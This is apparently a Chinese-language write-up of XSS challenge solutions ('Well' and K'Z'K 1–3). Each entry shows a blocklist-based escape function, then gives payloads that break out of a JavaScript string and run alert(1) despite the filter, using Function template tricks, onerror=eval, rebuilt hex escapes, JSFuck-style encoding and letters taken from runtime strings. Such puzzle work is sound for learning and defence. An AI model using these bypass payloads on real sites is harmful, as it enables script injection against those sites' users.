Well
题目:
function escape(s) {
  // http://www.avlidienbrunn.se/xsschallenge/
  // Challenge sink: `s` lands inside a single-quoted string literal in an
  // inline <script> after a character blocklist. The blocklist drops line
  // terminators, backslash, `;`, `,`, parens, brackets and `<`, but not the
  // `'` that delimits the literal, so it is not a context-aware encoding.
  // The defensive fix is to JSON-encode the value (escaping quotes, backslash
  // and `</`) or to avoid inlining untrusted data into a script at all.
  const stripped = s.replace(/[\r\n\u2028\u2029\\;,()\[\]<]/g, '');
  return `<script> var email = '${stripped}'; <\/script>`;
}
由於题目有限制无法使用 ()，我们可以使用 String.fromCharCode`40` 与 String.fromCharCode`41` 替代 ()
ANS
'+{valueOf:Function`baba${'alert'+String.fromCharCode`40`+1+String.fromCharCode`41`}`}//
'+{toString:Function`baba${'alert'+String.fromCharCode`40`+1+String.fromCharCode`41`}`}//
No
此题无法用 Firefox，可以使用 Chrome
题目:
// submitted by Stephen Leppik
// Challenge sink: `s` lands inside a double-quoted string literal in an
// inline <script>. Only ( ) ` < are stripped; `"` survives, so the literal
// can be closed, and the writeup below shows that removing call syntax does
// not remove the language's other ways of reaching code execution. Encode
// for the JS-string context (JSON-style escaping) instead of blocklisting.
function escape(s) {
  const cleaned = s.replace(/[()`<]/g, ''); // no function calls
  const markup = [
    '<script>',
    `var string = "${cleaned}";`,
    'console.log(string);',
    '</script>',
  ];
  return markup.join('\n');
}
题目把 ( ) < ` 去除。解题:
window.onerror 是 JavaScript 在 runtime error 时会触发的错误处理函数。用 eval 覆盖 onerror 函数，再用 throw
手动触发错误。ANS: ";onerror=eval;throw'=alert\x281\x29';//
K'Z'K (1)
题目:
// submitted by Stephen Leppik
// Challenge sink: a double-quoted string literal in an inline <script>.
// Vowels are dropped (case-insensitively) but `"` and `\` are not, so the
// filter neither keeps the value inside the literal nor stops hex escapes
// from spelling the removed letters. Context-aware encoding, not character
// removal, is what makes this sink safe.
function escape(s) {
  // remove vowels in honor of K'Z'K the Destroyer
  const devowelled = s.replace(/[aeiouy]/gi, '');
  return `<script>console.log("${devowelled}");</script>`;
}
解题:
[]["p\x6fp"]["c\x6fnstr\x75ct\x6fr"] 会得到 function constructor；
''+!1+!0+{}[0]+{} 会得到 "falsetrueundefined[object Object]"
ANS:
");[]["p\x6fp"]["c\x6fnstr\x75ct\x6fr"]('\x61l\x65rt(1)')()//
");_=''+!1+!0+{}[0]+{};[][_[3]+_[19]+_[6]+_[5]][_[23]+_[19]+_[10]+_[3]+_[5]+_[6]+_[7]+_[23]+_[5]+_[19]+_[6]](_[1]+_[2]+_[4]+_[6]+_[5]+'(1)')()//
");[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!
+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])//
K'Z'K (2)
// Challenge sink: a double-quoted string literal in an inline <script>.
// Besides vowels, one pass strips the hex/unicode/octal escapes that could
// spell them. A single non-recursive strip is not idempotent: deleting a
// match can splice its neighbours into a new escape sequence, which is the
// weakness the writeup below relies on. Encoding the output for the JS-string
// context avoids the whole class of recombination problems.
function escape(s) {
  // remove vowels and escape sequences in honor of K'Z'K
  // y is only sometimes a vowel, so it's only removed as a literal
  const VOWEL_OR_ESCAPE = /[aeiouy]|\\((x|u00)([46][159f]|[57]5)|1([04][15]|[15][17]|[26]5))/gi;
  // remove certain characters that can be used to get vowels
  const VOWEL_SOURCES = /[{}!=<>]/g;
  const cleaned = s.replace(VOWEL_OR_ESCAPE, '').replace(VOWEL_SOURCES, '');
  return `<script>console.log("${cleaned}");</script>`;
}
例如 \x6f 会被替换成空字串。\\x6fx6f 可拆成 \ + \x6f + x6f，其中只有一段连续字元是 \x6f；当这段 \x6f 被替换为空字串后，剩下的字元会重新组成 \x6f
ANS
");[]["p\\x6fx6fp"]["c\\x6fx6fnstr\\x75x75ct\\x6fx6fr"]('\\x61x61l\\x65x65rt(1)')()//
K'Z'K (3)
题目:
// submitted by Stephen Leppik
// Challenge sink: a double-quoted string literal in an inline <script>.
// Compared with the previous variant, `\` is now stripped too, so escape
// sequences cannot be rebuilt. Removing characters from the input still does
// not remove them from the language: the writeup below obtains the dropped
// letters from strings the runtime produces. Output encoding for the
// JS-string context is the fix that does not depend on enumerating tricks.
function escape(s) {
  // remove vowels in honor of K'Z'K the Destroyer
  const VOWELS = /[aeiouy]/gi;
  // remove certain characters that can be used to get vowels
  const VOWEL_SOURCES = /[{}!=<>\\]/g;
  const cleaned = s.replace(VOWELS, '').replace(VOWEL_SOURCES, '');
  return `<script>console.log("${cleaned}");</script>`;
}
{}!=<>\ 也过滤了。因为 ! 被过滤，本题无法直接使用 JSFuck；因为 \ 被过滤，也无法在字串中用 Hex 或 Oct 代替母音。解题:
虽然无法用 !，但所需的字元依然可以取得，例如:
''+[][[]] : 'undefined'，可以取得 e、i、u
+[][[]]+'' : 'NaN'，可以取得 a
[][(+[][[]]+'')[1] + 't']+'' : "function at() { [native code] }"，可以取得 o
如此一来，'c' + ([][(+[][[]]+'')[1] + 't']+'')[6]+ 'nstr' + (''+[][[]])[0] + 'ct' + ([][(+[][[]]+'')[1] + 't']+'')[6] + 'r' 就构成了 constructor，
而 (+[][[]]+'')[1] + 'l' + (''+[][[]])[3] + 'rt(1)' 就构成了 alert(1)
ANS:
");[][(+[][[]]+'')[1]+'t']['c'+([][(+[][[]]+'')[1]+'t']+'')[6]+'nstr'+(''+[][[]])[0]+'ct'+([][(+[][[]]+'')[1]+'t']+'')[6]+'r']((+[][[]]+'')[1]+'l'+(''+[][[]])[3] + 'rt(1)')()//
");[]['m'+(++[][[]]+[])[1]+'p']['c'+([]['m'+(++[][[]]+[])[1]+'p']+[])[6]+'nstr'+([][[]]+[])[0]+'ct'+([]['m'+(++[][[]]+[])[1]+'p']+[])[6]+'r']((++[][[]]+[])[1]+'l'+([][[]]+[])[3]+'rt(1)')()//